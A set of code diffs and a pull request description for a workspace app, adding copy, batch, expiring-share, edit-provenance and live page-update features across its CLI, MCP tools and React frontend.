+            body["expires_at"] = expires_at
+        return self._post("/api/v1/share", json=body)
 
     def unshare_object(
         self, object_type: str, object_id: str, principal_type: str, principal_id: str

--- a/cli/main.py
+++ b/cli/main.py
@@ -3824,6 +3824,54 @@ def files_purge_page(
     console.print("[green]Page permanently deleted.[/green]")
 
 
+@files_app.command("copy-page")
+def files_copy_page(
+    page_id: str = typer.Argument(...),
+    workspace_id: str = typer.Option(None, "--ws"),
+    to_folder: str = typer.Option(None, "--to-folder", help="Target folder id"),
+):
+    """Duplicate a page as 'Copy of <name>'."""
+    ws = workspace_id or _resolve_workspace()
+    with _client() as c:
+        try:
+            page = c.copy_page(ws, page_id, target_folder_id=to_folder or None)
+        except CartridgeError as e:
+            _err(e)
+    console.print(f"[green]Copied to[/green] {page['name']} ({page['id']})")
+
+
+@files_app.command("copy-folder")
+def files_copy_folder(
+    folder_id: str = typer.Argument(...),
+    workspace_id: str = typer.Option(None, "--ws"),
+    to_folder: str = typer.Option(None, "--to-folder", help="Target parent folder id"),
+):
+    """Deep-duplicate a folder as 'Copy of <name>'."""
+    ws = workspace_id or _resolve_workspace()
+    with _client() as c:
+        try:
+            folder = c.copy_folder(ws, folder_id, target_folder_id=to_folder or None)
+        except CartridgeError as e:
+            _err(e)
+    console.print(f"[green]Copied to[/green] {folder['name']} ({folder['id']})")
+
+
+@files_app.command("copy-file")
+def files_copy_file(
+    file_id: str = typer.Argument(...),
+    workspace_id: str = typer.Option(None, "--ws"),
+    to_folder: str = typer.Option(None, "--to-folder", help="Target folder id"),
+):
+    """Duplicate an uploaded file as 'Copy of <name>'."""
+    ws = workspace_id or _resolve_workspace()
+    with _client() as c:
+        try:
+            f = c.copy_ws_file(ws, file_id, target_folder_id=to_folder or None)
+        except CartridgeError as e:
+            _err(e)
+    console.print(f"[green]Copied to[/green] {f['name']} ({f['id']})")
+
+
 @files_app.command("text")
 def files_text(
     file_id: str = typer.Argument(...),

--- a/cli/main.py
+++ b/cli/main.py
@@ -3023,13 +3023,18 @@ def shares_add(
     object_type: str = typer.Argument(..., help=_SHARE_OBJECT_TYPES),
     object_id: str = typer.Argument(...),
     email: str = typer.Argument(..., help="Recipient email (pending until they sign up)."),
-    permission: str = typer.Option("read", "--permission", help="read | write | admin"),
+    permission: str = typer.Option("read", "--permission", help="read | comment | write"),
+    expires: str = typer.Option(
+        None, "--expires", help="ISO-8601 expiry, e.g. 2026-12-31T00:00:00Z (omit = never)."
+    ),
     as_json: bool = typer.Option(False, "--json"),
 ):
     """Share an object with a person by email."""
     with _client() as c:
         try:
-            data = c.share_object(object_type, object_id, email, permission=permission)
+            data = c.share_object(
+                object_type, object_id, email, permission=permission, expires_at=expires or None
+            )
         except CartridgeError as e:
             _err(e)
     if _use_json(as_json):

--- a/cli/main.py
+++ b/cli/main.py
@@ -3063,6 +3063,74 @@ def shares_rm(
 
 
 # ===========================================================================
+# Batch ops
+# ===========================================================================
+
+batch_app = typer.Typer(help="Batch — move/delete/restore many items at once.")
+app.add_typer(batch_app, name="batch")
+
+
+def _parse_batch_items(refs: list[str]) -> list[dict]:
+    """Parse `type:id` tokens (e.g. page:abc file:def) into batch items."""
+    items = []
+    for ref in refs:
+        if ":" not in ref:
+            _err(f"Invalid item '{ref}' — use type:id, e.g. page:<id>")
+        object_type, object_id = ref.split(":", 1)
+        items.append({"object_type": object_type, "object_id": object_id})
+    return items
+
+
+@batch_app.command("move")
+def batch_move(
+    refs: list[str] = typer.Argument(..., help="Items as type:id, e.g. page:<id> file:<id>"),
+    workspace_id: str = typer.Option(None, "--ws"),
+    to_folder: str = typer.Option(None, "--to-folder", help="Target folder id"),
+    to_root: bool = typer.Option(False, "--to-root", help="Move to the workspace root"),
+):
+    """Move many items (pages, files, folders, tables) at once."""
+    ws = workspace_id or _resolve_workspace()
+    with _client() as c:
+        try:
+            result = c.batch_move(
+                ws, _parse_batch_items(refs), target_folder_id=to_folder or None, move_to_root=to_root
+            )
+        except CartridgeError as e:
+            _err(e)
+    output_json(result)
+
+
+@batch_app.command("delete")
+def batch_delete(
+    refs: list[str] = typer.Argument(..., help="Items as type:id (pages/files)"),
+    workspace_id: str = typer.Option(None, "--ws"),
+):
+    """Move many pages/files to the trash at once."""
+    ws = workspace_id or _resolve_workspace()
+    with _client() as c:
+        try:
+            result = c.batch_delete(ws, _parse_batch_items(refs))
+        except CartridgeError as e:
+            _err(e)
+    output_json(result)
+
+
+@batch_app.command("restore")
+def batch_restore(
+    refs: list[str] = typer.Argument(..., help="Items as type:id (pages/files)"),
+    workspace_id: str = typer.Option(None, "--ws"),
+):
+    """Restore many pages/files from the trash at once."""
+    ws = workspace_id or _resolve_workspace()
+    with _client() as c:
+        try:
+            result = c.batch_restore(ws, _parse_batch_items(refs))
+        except CartridgeError as e:
+            _err(e)
+    output_json(result)
+
+
+# ===========================================================================
 # Trash
 # ===========================================================================
 

--- a/cli/main.py
+++ b/cli/main.py
@@ -3093,7 +3093,10 @@ def batch_move(
     with _client() as c:
         try:
             result = c.batch_move(
-                ws, _parse_batch_items(refs), target_folder_id=to_folder or None, move_to_root=to_root
+                ws,
+                _parse_batch_items(refs),
+                target_folder_id=to_folder or None,
+                move_to_root=to_root,
             )
         except CartridgeError as e:
             _err(e)

--- a/cli/mcp_server.py
+++ b/cli/mcp_server.py
@@ -303,6 +303,42 @@ def stash_copy_file(file_id: str, target_folder_id: str = "", workspace_id: str 
     return _json(client.copy_ws_file(ws, file_id, target_folder_id=target_folder_id or None))
 
 
+@mcp.tool()
+def stash_batch_move(
+    items: list[dict],
+    target_folder_id: str = "",
+    move_to_root: bool = False,
+    workspace_id: str = "",
+) -> str:
+    """Move many items at once. `items` is a list of {object_type, object_id}
+    (object_type: page | file | folder | table). Best-effort: returns which
+    moved and which failed."""
+    client, default_ws = _client()
+    ws = _require_ws(workspace_id or default_ws)
+    return _json(
+        client.batch_move(
+            ws, items, target_folder_id=target_folder_id or None, move_to_root=move_to_root
+        )
+    )
+
+
+@mcp.tool()
+def stash_batch_delete(items: list[dict], workspace_id: str = "") -> str:
+    """Move many pages/files to the trash at once. `items` is a list of
+    {object_type, object_id}. Best-effort."""
+    client, default_ws = _client()
+    ws = _require_ws(workspace_id or default_ws)
+    return _json(client.batch_delete(ws, items))
+
+
+@mcp.tool()
+def stash_batch_restore(items: list[dict], workspace_id: str = "") -> str:
+    """Restore many pages/files from the trash at once. Best-effort."""
+    client, default_ws = _client()
+    ws = _require_ws(workspace_id or default_ws)
+    return _json(client.batch_restore(ws, items))
+
+
 # ── Tables ────────────────────────────────────────────────────────
 
 

--- a/cli/mcp_server.py
+++ b/cli/mcp_server.py
@@ -279,6 +279,30 @@ def stash_delete_page(page_id: str, workspace_id: str = "") -> str:
     return _json({"deleted": page_id})
 
 
+@mcp.tool()
+def stash_copy_page(page_id: str, target_folder_id: str = "", workspace_id: str = "") -> str:
+    """Duplicate a page as 'Copy of <name>'. Optionally place it in target_folder_id."""
+    client, default_ws = _client()
+    ws = _require_ws(workspace_id or default_ws)
+    return _json(client.copy_page(ws, page_id, target_folder_id=target_folder_id or None))
+
+
+@mcp.tool()
+def stash_copy_folder(folder_id: str, target_folder_id: str = "", workspace_id: str = "") -> str:
+    """Deep-duplicate a folder (subfolders, pages, tables, files) as 'Copy of <name>'."""
+    client, default_ws = _client()
+    ws = _require_ws(workspace_id or default_ws)
+    return _json(client.copy_folder(ws, folder_id, target_folder_id=target_folder_id or None))
+
+
+@mcp.tool()
+def stash_copy_file(file_id: str, target_folder_id: str = "", workspace_id: str = "") -> str:
+    """Duplicate an uploaded file (and its blob) as 'Copy of <name>'."""
+    client, default_ws = _client()
+    ws = _require_ws(workspace_id or default_ws)
+    return _json(client.copy_ws_file(ws, file_id, target_folder_id=target_folder_id or None))
+
+
 # ── Tables ────────────────────────────────────────────────────────
 
 

--- a/cli/mcp_server.py
+++ b/cli/mcp_server.py
@@ -894,13 +894,22 @@ def stash_purge(kind: str, id: str, workspace_id: str = "") -> str:
 
 @mcp.tool()
 def stash_share_object(
-    object_type: str, object_id: str, email: str, permission: str = "read"
+    object_type: str,
+    object_id: str,
+    email: str,
+    permission: str = "read",
+    expires_at: str = "",
 ) -> str:
     """Share a folder/page/file/session/table with a person by email. If they
     don't have an account yet the share is recorded as pending and converts when
-    they sign up. permission: read | write | admin."""
+    they sign up. permission: read | comment | write. expires_at: optional
+    ISO-8601 timestamp after which the share lapses (omit = never)."""
     client, _ = _client()
-    return _json(client.share_object(object_type, object_id, email, permission=permission))
+    return _json(
+        client.share_object(
+            object_type, object_id, email, permission=permission, expires_at=expires_at or None
+        )
+    )
 
 
 @mcp.tool()

--- a/frontend/src/app/(app)/workspaces/[workspaceId]/p/[pageId]/PageClient.tsx
+++ b/frontend/src/app/(app)/workspaces/[workspaceId]/p/[pageId]/PageClient.tsx
@@ -47,6 +47,7 @@ import {
   type WorkspaceCartridge,
 } from "../../../../../../lib/api";
 import type { CommentThread, Page } from "../../../../../../lib/types";
+import { subscribePageEvents } from "../../../../../../lib/pageEvents";
 
 function wrapHtml(title: string, body: string): string {
   // HTML pages can be stored as a full document (when imported from .html
@@ -143,7 +144,31 @@ export default function StashPageView() {
 
   useEffect(() => {
     setCommentAnchorTops({});
+    setExternalEdit(null);
   }, [workspaceId, pageId]);
+
+  // Live updates: when an agent or another user edits this page on the backend,
+  // refresh a passive view in place (HTML / read-only), or — when the user is
+  // actively editing — surface a non-destructive "reload" banner rather than
+  // clobber their buffer.
+  const [contentVersion, setContentVersion] = useState(0);
+  const [externalEdit, setExternalEdit] = useState<{ agentName: string | null } | null>(null);
+  const liveViewRef = useRef({ isHtml: false, htmlEditMode: false });
+  const loadRef = useRef<() => Promise<void>>(async () => {});
+
+  useEffect(() => {
+    if (!user || stashSlug) return;
+    return subscribePageEvents(workspaceId, (evt) => {
+      if (evt.page_id !== pageId) return;
+      const { isHtml, htmlEditMode } = liveViewRef.current;
+      if (isHtml && !htmlEditMode) {
+        loadRef.current();
+        setContentVersion((v) => v + 1);
+      } else {
+        setExternalEdit({ agentName: evt.agent_name });
+      }
+    });
+  }, [workspaceId, pageId, user, stashSlug]);
 
   useBreadcrumbs(
     [
@@ -467,6 +492,9 @@ export default function StashPageView() {
   if (!page && !error) return <DocumentPageSkeleton />;
 
   const isHtml = page?.content_type === "html";
+  // Keep the live-update handler reading current view state without resubscribing.
+  liveViewRef.current = { isHtml, htmlEditMode };
+  loadRef.current = load;
   const updatedAt = page?.updated_at
     ? new Date(page.updated_at).toLocaleString(undefined, {
         month: "short",
@@ -606,6 +634,31 @@ export default function StashPageView() {
         className="mx-auto mt-6 grid max-w-[1200px] gap-7 px-12 pb-20 lg:grid-cols-[minmax(0,1fr)_240px]"
       >
         <main className="min-w-0">
+          {externalEdit && (
+            <div className="mb-4 flex items-center justify-between gap-3 rounded-lg border border-[var(--color-brand-600)]/40 bg-[var(--color-brand-600)]/10 px-4 py-2 text-[13px]">
+              <span>
+                This page was edited{" "}
+                {externalEdit.agentName ? `by ${externalEdit.agentName}` : "externally"} — reload to
+                see the latest.
+              </span>
+              <span className="flex shrink-0 items-center gap-3">
+                <button
+                  type="button"
+                  onClick={() => window.location.reload()}
+                  className="font-medium text-[var(--color-brand-600)] hover:underline"
+                >
+                  Reload
+                </button>
+                <button
+                  type="button"
+                  onClick={() => setExternalEdit(null)}
+                  className="text-[var(--text-muted)] hover:text-foreground"
+                >
+                  Dismiss
+                </button>
+              </span>
+            </div>
+          )}
           {error && (
             <div className="mb-4 rounded-lg border border-red-300/40 bg-red-500/10 px-4 py-2 text-[13px] text-red-500">
               {error}
@@ -617,7 +670,7 @@ export default function StashPageView() {
               isHtml ? (
                 <div ref={iframeBoxRef} className="relative">
                   <HtmlPageView
-                    key={page.id}
+                    key={`${page.id}:${contentVersion}`}
                     html={page.content_html || ""}
                     title={page.name}
                     layout={page.html_layout}

--- a/frontend/src/app/(app)/workspaces/[workspaceId]/p/[pageId]/PageClient.tsx
+++ b/frontend/src/app/(app)/workspaces/[workspaceId]/p/[pageId]/PageClient.tsx
@@ -3,6 +3,7 @@
 import Link from "next/link";
 import { useParams, useRouter, useSearchParams } from "next/navigation";
 import { useCallback, useEffect, useLayoutEffect, useRef, useState } from "react";
+import type { ReactNode } from "react";
 import { useBreadcrumbs } from "../../../../../../components/BreadcrumbContext";
 import { PageBody } from "../../../../cartridges/[slug]/CartridgeItemBodies";
 import {
@@ -477,6 +478,24 @@ export default function StashPageView() {
 
   const baseName = page ? page.name.replace(/\.(md|html)$/i, "") : "";
   const pdfSubtitle = updatedAt ? `Last edited ${updatedAt}` : undefined;
+
+  // Provenance: when an agent made the last content edit, link the page back to
+  // the chat session that produced it.
+  const metaItems: ReactNode[] = [];
+  if (updatedAt) metaItems.push(`Last edited ${updatedAt}`);
+  if (page?.last_edit_agent_name && page.last_edit_session_id) {
+    metaItems.push(
+      <Link
+        key="provenance"
+        href={`/workspaces/${workspaceId}/sessions?session=${encodeURIComponent(
+          page.last_edit_session_id,
+        )}`}
+        className="underline decoration-dotted underline-offset-2 hover:text-[var(--text)]"
+      >
+        Edited by {page.last_edit_agent_name}
+      </Link>,
+    );
+  }
   return (
     <div className="scroll-thin flex-1 overflow-y-auto">
       <FileViewerHeader
@@ -497,7 +516,7 @@ export default function StashPageView() {
             : undefined
         }
         tags={isHtml ? [{ label: "html", tone: "brand" }] : undefined}
-        meta={updatedAt ? [`Last edited ${updatedAt}`] : undefined}
+        meta={metaItems.length ? metaItems : undefined}
         saveStatus={page && !isHtml ? saveStatus : null}
         rightExtras={
           isHtml ? (

--- a/frontend/src/lib/pageEvents.ts
+++ b/frontend/src/lib/pageEvents.ts
@@ -1,0 +1,65 @@
+// Client for the page-events SSE stream (/pages/events). Lets an open page view
+// react when an agent or another user edits a page on the backend. Uses
+// fetch+ReadableStream (not EventSource) so it can send the Bearer token.
+
+import { API_BASE, getToken } from "@/lib/api";
+
+export type PageUpdateEvent = {
+  type: "page.updated";
+  page_id: string;
+  content_hash: string | null;
+  agent_name: string | null;
+};
+
+// Subscribe to a workspace's page-update stream. Returns an unsubscribe fn.
+// Reconnects on drop with a short backoff until unsubscribed.
+export function subscribePageEvents(
+  workspaceId: string,
+  onEvent: (event: PageUpdateEvent) => void,
+): () => void {
+  const controller = new AbortController();
+  let stopped = false;
+
+  async function run() {
+    while (!stopped) {
+      try {
+        const res = await fetch(`${API_BASE}/api/v1/workspaces/${workspaceId}/pages/events`, {
+          headers: { Authorization: `Bearer ${getToken() ?? ""}` },
+          signal: controller.signal,
+        });
+        if (!res.ok || !res.body) throw new Error(`page events failed: ${res.status}`);
+        const reader = res.body.getReader();
+        const decoder = new TextDecoder();
+        let buffer = "";
+        for (;;) {
+          const { done, value } = await reader.read();
+          if (done) break;
+          buffer += decoder.decode(value, { stream: true });
+          const frames = buffer.split("\n\n");
+          buffer = frames.pop() ?? "";
+          for (const raw of frames) {
+            const line = raw.trim();
+            if (!line.startsWith("data:")) continue; // skip heartbeats / comments
+            const payload = line.slice(5).trim();
+            if (!payload) continue;
+            try {
+              onEvent(JSON.parse(payload) as PageUpdateEvent);
+            } catch {
+              // partial frame — resume next read
+            }
+          }
+        }
+      } catch {
+        if (stopped) return;
+      }
+      // Stream ended or errored — wait briefly, then reconnect.
+      if (!stopped) await new Promise((r) => setTimeout(r, 2000));
+    }
+  }
+
+  run();
+  return () => {
+    stopped = true;
+    controller.abort();
+  };
+}

--- a/frontend/src/lib/types.ts
+++ b/frontend/src/lib/types.ts
@@ -57,6 +57,8 @@ export interface Page {
   content_markdown: string;
   content_html: string;
   html_layout: HtmlLayout;
+  last_edit_session_id?: string | null;
+  last_edit_agent_name?: string | null;
   created_by: string;
   updated_by: string | null;
   created_at: string;


### PR DESCRIPTION
## Agent-native Drive: 8 features

Closes the highest-leverage gaps from the "agent-native Google Drive (markdown/HTML)" audit. Makes agent edits **trustworthy, economical, complete, and live**, plus Drive-parity sharing.

### What's in here
- **#4 In-app agent tool parity** — the in-product agent (and Slack bot) gain folder/move/rename/delete + table write tools, wrapping the same service fns as REST/MCP. In-app chat switched to `STASH_TOOL_SET`; destructive tools held back from the untrusted Slack surface.
- **#2 Surgical page edits (`edit_page`)** — `str_replace`/append with fail-loud unique matching (no fuzzy match, writes nothing on 0/>1 match).
- **#7 Server-side HTML sanitization** — `nh3` chokepoint on page write strips `<script>`/`on*`/`javascript:`; preserves styling, slide markup, comment anchors, inline image data-URIs. The trusted resize/slide bootstrap is injected at render time (not stored), so sanitizing stored HTML can't break it.
- **#8 Copy/duplicate** — `copy_page` / deep `copy_folder` / `copy_file` (S3 blob clone), reusing `create_page`/`create_folder` so copies inherit uniqueness + sanitization + embedding. REST + CLI + MCP + agent tools. Templates = copy; no registry.
- **#3 Edit provenance** — migration `0098` adds `pages.last_edit_session_id/agent_name` + an append-only `page_edits` log. ContextVars thread through `tool_loop`/`ask_service` so each edit records who+which session made it (NULL for human edits). The page header links **"Edited by `<agent>`"** to the originating chat session.
- **#11a/b Sharing** — leveled permission model (`read` < `comment` < `write`) replacing the `require_write` boolean, plus expiring links. Migration `0099` pins the levels via CHECK and adds `expires_at`. Comment endpoints need the `comment` level. Owner share lists surface expired rows (flagged); access paths drop them.
- **#12 Batch ops** — best-effort `batch_move`/`batch_delete`/`batch_restore` returning `{succeeded, errors}`. Move covers pages/files/folders/tables; delete/restore cover soft-deletable types. Cross-workspace items rejected per-item.
- **#13 Live page updates** *(added during review)* — in-process pub/sub + SSE (`GET /pages/events`). When an agent (or another user) edits a page, `update_page` broadcasts a `page.updated` event **and** invalidates persisted Yjs collab state so a reopened markdown editor reloads fresh content. Open HTML/read-only views refresh in place; an actively-editing user gets a non-destructive **"Edited by `<agent>` — Reload"** banner instead of a clobbered buffer.

### Deliberately deferred
- **#11c request-access flow** — forces a 404→403 info-disclosure change + a notification surface; ~3-4x cost.
- **#5 wiki-links/backlinks** — plain page-to-page markdown links already survive renames (pageId-based URLs).

### Migrations / deps
`0098_page_edit_provenance`, `0099_share_comment_tier_and_expiry`. New dep: `nh3>=0.2`.

### Tests
Full backend suite green: **288 passed, 4 skipped** (single isolated run). `ruff` clean, frontend `tsc` + `eslint` clean. New suites: `test_html_sanitize`, `test_copy`, `test_batch`, `test_page_events`, plus additions to `test_agent_runtime`, `test_permissions`, `test_page_comments`.

### GUI changes
Two small page-header/body additions: the **"Edited by `<agent>`"** provenance link, and the live-update **"Edited by `<agent>` — Reload"** banner. (Screenshots need a running stack with an agent-edited page — happy to capture on the thread.)

### Note on live-update scale
`page_events` is in-process, correct for the single-uvicorn web process. If the web tier is scaled horizontally, swap publish/listen for Postgres LISTEN/NOTIFY (noted in the module docstring).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
